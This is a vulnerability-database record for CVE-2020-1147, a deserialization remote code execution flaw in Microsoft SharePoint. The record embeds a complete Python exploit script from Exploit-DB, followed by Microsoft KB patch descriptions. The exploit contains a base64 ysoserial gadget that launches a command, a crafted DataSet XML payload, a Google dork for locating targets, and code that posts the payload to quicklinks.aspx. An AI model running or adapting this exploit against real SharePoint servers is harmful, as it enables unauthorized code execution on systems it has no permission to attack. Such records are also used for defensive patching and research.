DATABASE RESOURCES PRICING ABOUT US

{"id": "EDB-ID:50151", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Microsoft SharePoint Server 2019 - Remote Code Execution (2)", "description": "", "published": "2021-07-23T00:00:00", "modified": "2021-07-23T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.8}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://www.exploit-db.com/exploits/50151", "reporter": "Podalirius", "references": [], "cvelist": ["2020-1147", "CVE-2020-1147"], "immutableFields": [], "lastseen": "2022-08-16T06:04:32", "viewCount": 506, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:9772927E-D7AA-4C42-B8B0-1B598D66E84D"]}, {"type": "avleonov", "idList": ["AVLEONOV:7DAB33D28205885E8979C4C664958CDC"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0663"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2020-1147"]}, {"type": "cve", "idList": ["CVE-2020-1147"]}, {"type": "exploitdb", "idList": ["EDB-ID:48747"]}, {"type": "kaspersky", "idList": ["KLA11859", "KLA11864"]}, {"type": "mscve", "idList": ["MS:CVE-2020-1147"]}, {"type": "mskb", "idList": ["KB4484436", "KB4484443", "KB4484453", "KB4484460", "KB4565627", "KB4565628", "KB4565629", "KB4565630", "KB4565631", "KB4565633", "KB4566466", "KB4566467", "KB4566468", "KB4566469", "KB4566516", "KB4566517", "KB4566518", "KB4566519", "KB4566520"]}, {"type": "nessus", "idList": ["CENTOS8_RHSA-2020-2938.NASL", "CENTOS8_RHSA-2020-2954.NASL", "ORACLELINUX_ELSA-2020-2938.NASL", "ORACLELINUX_ELSA-2020-2954.NASL", "REDHAT-RHSA-2020-2937.NASL", "REDHAT-RHSA-2020-2938.NASL", "REDHAT-RHSA-2020-2939.NASL", "REDHAT-RHSA-2020-2954.NASL", "REDHAT-RHSA-2020-2988.NASL", "REDHAT-RHSA-2020-2989.NASL", "SMB_NT_MS20_JUL_4558998.NASL", "SMB_NT_MS20_JUL_4565483.NASL", "SMB_NT_MS20_JUL_4565489.NASL", "SMB_NT_MS20_JUL_4565503.NASL", "SMB_NT_MS20_JUL_4565508.NASL", "SMB_NT_MS20_JUL_4565511.NASL", "SMB_NT_MS20_JUL_4565513.NASL", "SMB_NT_MS20_JUL_4565524.NASL", "SMB_NT_MS20_JUL_4565536.NASL", "SMB_NT_MS20_JUL_4565537.NASL", "SMB_NT_MS20_JUL_4565541.NASL", "SMB_NT_MS20_JUL_DOTNET.NASL", "SMB_NT_MS20_JUL_DOTNET_CORE.NASL", "SMB_NT_MS20_JUL_DOTNET_CORE_SDK.NASL", "SMB_NT_MS20_JUL_OFFICE_SHAREPOINT.NASL", "SMB_NT_MS20_JUL_VISUAL_STUDIO.NASL", "WEB_APPLICATION_SCANNING_112590", "WEB_APPLICATION_SCANNING_112591", "WEB_APPLICATION_SCANNING_112592", "WEB_APPLICATION_SCANNING_112593"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310817086", "OPENVAS:1361412562310817087", "OPENVAS:1361412562310817223", "OPENVAS:1361412562310817226", "OPENVAS:1361412562310817227", "OPENVAS:1361412562310817229", "OPENVAS:1361412562310817301", "OPENVAS:1361412562310817305", "OPENVAS:1361412562310817306", "OPENVAS:1361412562310817308"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-2938", "ELSA-2020-2954"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:158694", "PACKETSTORM:158876", "PACKETSTORM:163644"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:F343178EEC11B54CFAFBD0B4D505010B"]}, {"type": "redhat", "idList": ["RHSA-2020:2937", "RHSA-2020:2938", "RHSA-2020:2939", "RHSA-2020:2954", "RHSA-2020:2988", "RHSA-2020:2989"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-1147"]}, {"type": "veracode", "idList": ["VERACODE:25890", "VERACODE:25896"]}, {"type": "zdt", "idList": ["1337DAY-ID-34772", "1337DAY-ID-34840", "1337DAY-ID-36588"]}]}, "score": {"value": -0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:9772927E-D7AA-4C42-B8B0-1B598D66E84D"]}, {"type": "avleonov", "idList": ["AVLEONOV:7DAB33D28205885E8979C4C664958CDC"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0663"]}, {"type": "cve", "idList": ["CVE-2020-1147"]}, {"type": "exploitdb", "idList": ["EDB-ID:48747"]}, {"type": "kaspersky", "idList": ["KLA11859", "KLA11864"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/SHAREPOINT_DATA_DESERIALIZATION"]}, {"type": "mscve", "idList": ["MS:CVE-2020-1147"]}, {"type": "mskb", "idList": ["KB4566516"]}, {"type": "nessus", "idList": ["ORACLELINUX_ELSA-2020-2938.NASL", "ORACLELINUX_ELSA-2020-2954.NASL", "REDHAT-RHSA-2020-2937.NASL", "REDHAT-RHSA-2020-2938.NASL", "REDHAT-RHSA-2020-2939.NASL", "REDHAT-RHSA-2020-2954.NASL", "REDHAT-RHSA-2020-2989.NASL", "SMB_NT_MS20_JUL_DOTNET.NASL", "SMB_NT_MS20_JUL_DOTNET_CORE.NASL", "SMB_NT_MS20_JUL_DOTNET_CORE_SDK.NASL", "SMB_NT_MS20_JUL_OFFICE_SHAREPOINT.NASL", "SMB_NT_MS20_JUL_VISUAL_STUDIO.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310817086", "OPENVAS:1361412562310817087", "OPENVAS:1361412562310817223", "OPENVAS:1361412562310817226", "OPENVAS:1361412562310817227", "OPENVAS:1361412562310817229", "OPENVAS:1361412562310817301", "OPENVAS:1361412562310817305", "OPENVAS:1361412562310817306", "OPENVAS:1361412562310817308"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-2938", "ELSA-2020-2954"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:158694"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:F343178EEC11B54CFAFBD0B4D505010B"]}, {"type": "redhat", "idList": ["RHSA-2020:2938"]}, {"type": "zdt", "idList": ["1337DAY-ID-34772"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2020-1147", "epss": "0.825200000", "percentile": "0.978080000", "modified": "2023-03-17"}], "vulnersScore": -0.2}, "_state": {"dependencies": 1661190686, "score": 1661184847, "epss": 1679098904}, "_internal": {"score_hash": "b949ef686d538ed6fb4ab0261d902d9d"}, "sourceHref": "https://www.exploit-db.com/download/50151", "sourceData": "# Exploit Title: Microsoft SharePoint Server 2019 - Remote Code Execution (2)\r\n# Google Dork: inurl:quicklinks.aspx\r\n# Date: 2020-08-14\r\n# Exploit Author: West Shepherd\r\n# Vendor Homepage: https://www.microsoft.com\r\n# Version: SharePoint Enterprise Server 2013 Service Pack 1, SharePoint Enterprise Server 2016 , SharePoint Server 2010 Service\r\n# Pack 2, SharePoint Server 2019\r\n# Tested on: Windows 2016\r\n# CVE : CVE-2020-1147\r\n# Credit goes to Steven Seele and Soroush Dalili\r\n# Source: https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html\r\n\r\n#!/usr/bin/python\r\nfrom sys import argv, exit, stdout, stderr\r\nimport argparse\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nfrom requests_ntlm import HttpNtlmAuth\r\nfrom urllib import quote, unquote\r\nimport logging\r\n\r\n\r\nclass Exploit(object):\r\n # To generate the gadget use:\r\n # ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c \"command\"\r\n # ysoserial.exe -g TextFormattingRunProperties -f LosFormatter -c \"command\"\r\n gadget = '/wEypAcAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADGBTw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8+DQo8T2JqZWN0RGF0YVByb3ZpZGVyIE1ldGhvZE5hbWU9IlN0YXJ0IiBJc0luaXRpYWxMb2FkRW5hYmxlZD0iRmFsc2UiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOnNkPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1TeXN0ZW0iIHhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIj4NCiAgPE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCiAgICA8c2Q6UHJvY2Vzcz4NCiAgICAgIDxzZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICAgICAgPHNkOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIvYyBwaW5nIC9uIDEwIDEwLjQ5LjExNy4yNTMiIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0iY21kIiAvPg0KICAgICAgPC9zZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICA8L3NkOlByb2Nlc3M+DQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KPC9PYmplY3REYXRhUHJvdmlkZXI+Cw=='\r\n control_path_quicklinks = '/_layouts/15/quicklinks.aspx'\r\n control_path_quicklinksdialogform = '/_layouts/15/quicklinksdialogform.aspx'\r\n control_path = control_path_quicklinks\r\n\r\n def __init__(self, redirect=False, proxy_address='', username='', domain='', password='', target=''):\r\n requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\n self.username = '%s\\\\%s' % (domain, username)\r\n self.target = target\r\n self.password = password\r\n self.session = requests.session()\r\n self.redirect = redirect\r\n self.timeout = 0.5\r\n self.proxies = {\r\n 'http': 'http://%s' % proxy_address,\r\n 'https': 'http://%s' % proxy_address\r\n } \\\r\n if proxy_address is not None \\\r\n and proxy_address != '' else {}\r\n self.headers = {}\r\n self.query_params = {\r\n 'Mode': \"Suggestion\"\r\n }\r\n self.form_values = {\r\n '__viewstate': '',\r\n '__SUGGESTIONSCACHE__': ''\r\n }\r\n self.cookies = {}\r\n self.payload = \"\"\"\\\r\n<DataSet>\r\n <xs:schema xmlns=\"\" xmlns:xs=\"http://www.w3.org/2001/XMLSchema\"\r\nxmlns:msdata=\"urn:schemas-microsoft-com:xml-msdata\" id=\"somedataset\">\r\n <xs:element name=\"somedataset\" msdata:IsDataSet=\"true\"\r\nmsdata:UseCurrentLocale=\"true\">\r\n <xs:complexType>\r\n <xs:choice minOccurs=\"0\" maxOccurs=\"unbounded\">\r\n <xs:element name=\"Exp_x0020_Table\">\r\n <xs:complexType>\r\n <xs:sequence>\r\n <xs:element name=\"pwn\"\r\nmsdata:DataType=\"System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter,\r\nSystem.Web, Version=4.0.0.0, Culture=neutral,\r\nPublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider,\r\nPresentationFramework, Version=4.0.0.0, Culture=neutral,\r\nPublicKeyToken=31bf3856ad364e35]], System.Data.Services,\r\nVersion=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"\r\ntype=\"xs:anyType\" minOccurs=\"0\"/>\r\n </xs:sequence>\r\n </xs:complexType>\r\n </xs:element>\r\n </xs:choice>\r\n </xs:complexType>\r\n </xs:element>\r\n </xs:schema>\r\n <diffgr:diffgram xmlns:msdata=\"urn:schemas-microsoft-com:xml-msdata\"\r\nxmlns:diffgr=\"urn:schemas-microsoft-com:xml-diffgram-v1\">\r\n <somedataset>\r\n <Exp_x0020_Table diffgr:id=\"Exp Table1\" msdata:rowOrder=\"0\"\r\ndiffgr:hasChanges=\"inserted\">\r\n <pwn xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\r\nxmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\r\n <ExpandedElement/>\r\n <ProjectedProperty0>\r\n <MethodName>Deserialize</MethodName>\r\n <MethodParameters>\r\n <anyType\r\nxmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\r\nxmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"\r\nxsi:type=\"xsd:string\">{GADGET}</anyType>\r\n </MethodParameters>\r\n <ObjectInstance xsi:type=\"LosFormatter\"></ObjectInstance>\r\n </ProjectedProperty0>\r\n </pwn>\r\n </Exp_x0020_Table>\r\n </somedataset>\r\n </diffgr:diffgram>\r\n</DataSet>\"\"\".replace('{GADGET}', self.gadget)\r\n\r\n def do_get(self, url, params=None, data=None):\r\n return self.session.get(\r\n url=url,\r\n verify=False,\r\n allow_redirects=self.redirect,\r\n headers=self.headers,\r\n cookies=self.cookies,\r\n proxies=self.proxies,\r\n data=data,\r\n params=params,\r\n auth=HttpNtlmAuth(self.username, self.password)\r\n )\r\n\r\n def do_post(self, url, data=None, params=None):\r\n return self.session.post(\r\n url=url,\r\n data=data,\r\n verify=False,\r\n allow_redirects=self.redirect,\r\n headers=self.headers,\r\n cookies=self.cookies,\r\n proxies=self.proxies,\r\n params=params,\r\n auth=HttpNtlmAuth(self.username, self.password)\r\n )\r\n\r\n def parse_page(self, content):\r\n soup = BeautifulSoup(content, 'lxml')\r\n for key, val in self.form_values.iteritems():\r\n try:\r\n for tag in soup.select('input[name=%s]' % key):\r\n try:\r\n self.form_values[key] = tag['value']\r\n except Exception as error:\r\n stderr.write('error for key %s error %s\\n' % (key, str(error)))\r\n except Exception as error:\r\n stderr.write('error for selector %s error %s\\n' % (key, str(error)))\r\n return self\r\n\r\n def debug(self):\r\n try:\r\n import http.client as http_client\r\n except ImportError:\r\n import httplib as http_client\r\n http_client.HTTPConnection.debuglevel = 1\r\n logging.basicConfig()\r\n logging.getLogger().setLevel(logging.DEBUG)\r\n requests_log = logging.getLogger(\"requests.packages.urllib3\")\r\n requests_log.setLevel(logging.DEBUG)\r\n requests_log.propagate = True\r\n return self\r\n\r\n def clean(self, payload):\r\n payload = payload.replace('\\n', '').replace('\\r', '')\r\n while ' ' in payload:\r\n payload = payload.replace(' ', ' ')\r\n return payload\r\n\r\n def get_form(self):\r\n url = '%s%s' % (self.target, self.control_path)\r\n resp = self.do_get(url=url, params=self.query_params)\r\n self.parse_page(content=resp.content)\r\n return resp\r\n\r\n def send_payload(self):\r\n url = '%s%s' % (self.target, self.control_path)\r\n # self.get_form()\r\n self.headers['Content-Type'] = 'application/x-www-form-urlencoded'\r\n self.form_values['__SUGGESTIONSCACHE__'] = self.clean(self.payload)\r\n self.form_values['__viewstate'] = ''\r\n resp = self.do_post(url=url, params=self.query_params, data=self.form_values)\r\n return resp\r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser(add_help=True, description='CVE-2020-1147 SharePoint exploit')\r\n try:\r\n parser.add_argument(\"-target\", action='store', help='Target address: http(s)://target.com ')\r\n parser.add_argument(\"-username\", action='store', default='', help='Username to use: first.last')\r\n parser.add_argument(\"-domain\", action='store', default='', help='User domain to use: domain.local')\r\n parser.add_argument(\"-password\", action='store', default='', help='Password to use: Summer2020')\r\n parser.add_argument(\"-both\", action='store', default=False, help='Try both pages (quicklinks.aspx and quicklinksdialogform.aspx): False')\r\n parser.add_argument(\"-debug\", action='store', default=False, help='Enable debugging: False')\r\n parser.add_argument(\"-proxy\", action='store', default='', help='Enable proxy: 10.10.10.10:8080')\r\n\r\n if len(argv) == 1:\r\n parser.print_help()\r\n exit(1)\r\n options = parser.parse_args()\r\n\r\n exp = Exploit(\r\n proxy_address=options.proxy,\r\n username=options.username,\r\n domain=options.domain,\r\n password=options.password,\r\n target=options.target\r\n )\r\n\r\n if options.debug:\r\n exp.debug()\r\n stdout.write('target %s username %s domain %s password %s debug %s proxy %s\\n' % (\r\n options.target, options.username, options.domain, options.password, options.debug, options.proxy\r\n ))\r\n\r\n result = exp.send_payload()\r\n stdout.write('Response: %d\\n' % result.status_code)\r\n if 'MicrosoftSharePointTeamServices' in result.headers:\r\n stdout.write('Version: %s\\n' % result.headers['MicrosoftSharePointTeamServices'])\r\n if options.both and result.status_code != 200:\r\n exp.control_path = exp.control_path_quicklinksdialogform\r\n stdout.write('Trying alternate page\\n')\r\n result = exp.send_payload()\r\n stdout.write('Response: %d\\n' % result.status_code)\r\n\r\n except Exception as error:\r\n stderr.write('error in main %s' % str(error))", "osvdbidlist": [], "exploitType": "webapps", "verified": false}

{"mskb": [{"lastseen": "2021-01-01T22:38:15", "description": "<html><body><p>July 14, 2020-KB4565631 Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1803</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <div class=\"row\"> <div class=\"col-xs-24\"> <p> Release Date:<br/><strong>July 14, 2020</strong></p> <p> Version:<br/><strong> .NET Framework 4.8</strong></p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists in .NET Framework when the software fails to check the source markup of XML file input. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the process responsible for deserialization of the XML content. To exploit this vulnerability, an attacker could upload a specially crafted document to a server utilizing an affected product to process content. The security update addresses the vulnerability by correcting how .NET Framework validates the source markup of XML content. </p><p> This security update affects how .NET Framework's System.Data.DataTable and System.Data.DataSet types read XML-serialized data. Most .NET Framework applications will not experience any behavioral change after the update is installed. For more information on how the update affects .NET Framework, including examples of scenarios which may be affected, please see the DataTable and DataSet security guidance document at <a href=\"https://go.microsoft.com/fwlink/?linkid=2132227\" id=\"2132227\" target=\"_self\">https://go.microsoft.com/fwlink/?linkid=2132227</a>. </p><p> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147\" id=\"kb-link-2\" target=\"_self\">CVE-2020-1147</a></li></ul><h2>Known issues in this update</h2><p> <span>Microsoft is not currently aware of any issues in this update.</span> </p><h2>How to get this update</h2><p> <strong>Install this update</strong> </p><table class=\"table\"> <tbody> <tr> <td> <strong>Release Channel</strong> </td> <td align=\"center\"> <strong>Available</strong> </td> <td> <strong>Next Step</strong> </td> </tr> <tr> <td>Windows Update and Microsoft Update</td> <td align=\"center\">Yes</td> <td>None. This update will be downloaded and installed automatically from Windows Update.</td> </tr> <tr> <td>Microsoft Update Catalog</td> <td align=\"center\">Yes</td> <td> To get the standalone package for this update, go to the <a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4565631\">Microsoft Update Catalog</a> website. </td> </tr> <tr> <td>Windows Server Update Services (WSUS)</td> <td align=\"center\">Yes</td> <td> <p> This update will automatically sync with WSUS if you configure <strong>Products and Classifications</strong> as follows: </p> <p> <strong>Product</strong>:Windows 10 Version 1803</p> <strong>Classification</strong>: Security Updates </td> </tr> </tbody> </table><p></p><p> <strong>File information</strong> </p><p> <span>For a list of the files that are provided in this update, download the </span> <a data-content-id=\"\" data-content-type=\"\" href=\"https://download.microsoft.com/download/c/b/8/cb8598c1-afd2-4172-8c0a-b2df1dac13a9/4565631.csv\" managed-link=\"\" target=\"_blank\"> file information for cumulative update </a>. </p><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-14T00:00:00", "type": "mskb", "title": "July 14, 2020-KB4565631 Cumulative Update for .NET Framework 4.8 for Windows 10 Version 1803", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147"], "modified": "2020-07-14T16:57:27", "id": "KB4565631", "href": "https://support.microsoft.com/en-us/help/4565631/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T22:50:00", "description": "<html><body><p>July 14, 2020-KB4565628 Cumulative Update for .NET Framework 4.8 for Windows 10 version 1607 and Windows Server 2016</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <div class=\"row\"> <div class=\"col-xs-24\"> <p> Release Date:<br/><strong>July 14, 2020</strong></p> <p> Version:<br/><strong> .NET Framework 4.8</strong></p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists in .NET Framework when the software fails to check the source markup of XML file input. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the process responsible for deserialization of the XML content. To exploit this vulnerability, an attacker could upload a specially crafted document to a server utilizing an affected product to process content. The security update addresses the vulnerability by correcting how .NET Framework validates the source markup of XML content. </p><p> This security update affects how .NET Framework's System.Data.DataTable and System.Data.DataSet types read XML-serialized data. Most .NET Framework applications will not experience any behavioral change after the update is installed. For more information on how the update affects .NET Framework, including examples of scenarios which may be affected, please see the DataTable and DataSet security guidance document at <a href=\"https://go.microsoft.com/fwlink/?linkid=2132227\" id=\"2132227\" target=\"_self\">https://go.microsoft.com/fwlink/?linkid=2132227</a>. </p><p> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147\" id=\"kb-link-2\" target=\"_self\">CVE-2020-1147</a></li></ul><h2>Known issues in this update</h2><p> <span>Microsoft is not currently aware of any issues in this update.</span> </p><h2>How to get this update</h2><p> <strong>Install this update</strong> </p><table class=\"table\"> <tbody> <tr> <td> <strong>Release Channel</strong> </td> <td align=\"center\"> <strong>Available</strong> </td> <td> <strong>Next Step</strong> </td> </tr> <tr> <td>Windows Update and Microsoft Update</td> <td align=\"center\">Yes</td> <td>None. This update will be downloaded and installed automatically from Windows Update.</td> </tr> <tr> <td>Microsoft Update Catalog</td> <td align=\"center\">Yes</td> <td> To get the standalone package for this update, go to the <a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=4565628\">Microsoft Update Catalog</a> website. </td> </tr> <tr> <td>Windows Server Update Services (WSUS)</td> <td align=\"center\">Yes</td> <td> <p> This update will automatically sync with WSUS if you configure <strong>Products and Classifications</strong> as follows: </p> <p> <strong>Product</strong>:Windows 10 version 1607 and Windows Server 2016</p> <strong>Classification</strong>: Security Updates </td> </tr> </tbody> </table><p></p><p> <strong>File information</strong> </p><p> <span>For a list of the files that are provided in this update, download the </span> <a data-content-id=\"\" data-content-type=\"\" href=\"https://download.microsoft.com/download/c/b/8/cb8598c1-afd2-4172-8c0a-b2df1dac13a9/4565628.csv\" managed-link=\"\" target=\"_blank\"> file information for cumulative update </a>. </p><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-14T00:00:00", "type": "mskb", "title": "July 14, 2020-KB4565628 Cumulative Update for .NET Framework 4.8 for Windows 10 version 1607 and Windows Server 2016", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147"], "modified": "2020-07-14T16:57:28", "id": "KB4565628", "href": "https://support.microsoft.com/en-us/help/4565628/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-24T11:29:38", "description": "None\n## Notice\n\n**Revised 6/8/2021** On June 8th, 2021, this update was released to replace a previous update to address a \u201crevocation server was offline\u201d error that may occur during installation. If you've already installed a previous release of this update, no action is required. To obtain the latest version of these updates, see the \"How to obtain and install the update\" section of the individual update article. Links to each article are found in the \"Additional information about this update\" section of this article. On April 13th, 2021, this update was released to replace a previous release of this update.On October 13th, 2020 we are republishing this update to resolve a known issue that affected the original release. You should install this version (V3) of the update as part of your normal security routine.On July 23, 2020, update KB4565583 v2 and KB4565586 v2 were released to replace v1 of those updates for .NET Framework 4.5.2 and 4.6 for Windows Server 2008 SP2. The v1 updates did not install for customers who had certain ESU configurations. The v2 updates correct the issue for customers who could not install the v1 updates. \n\n**Applies to:**Microsoft .NET Framework 2.0 Microsoft .NET Framework 3.0 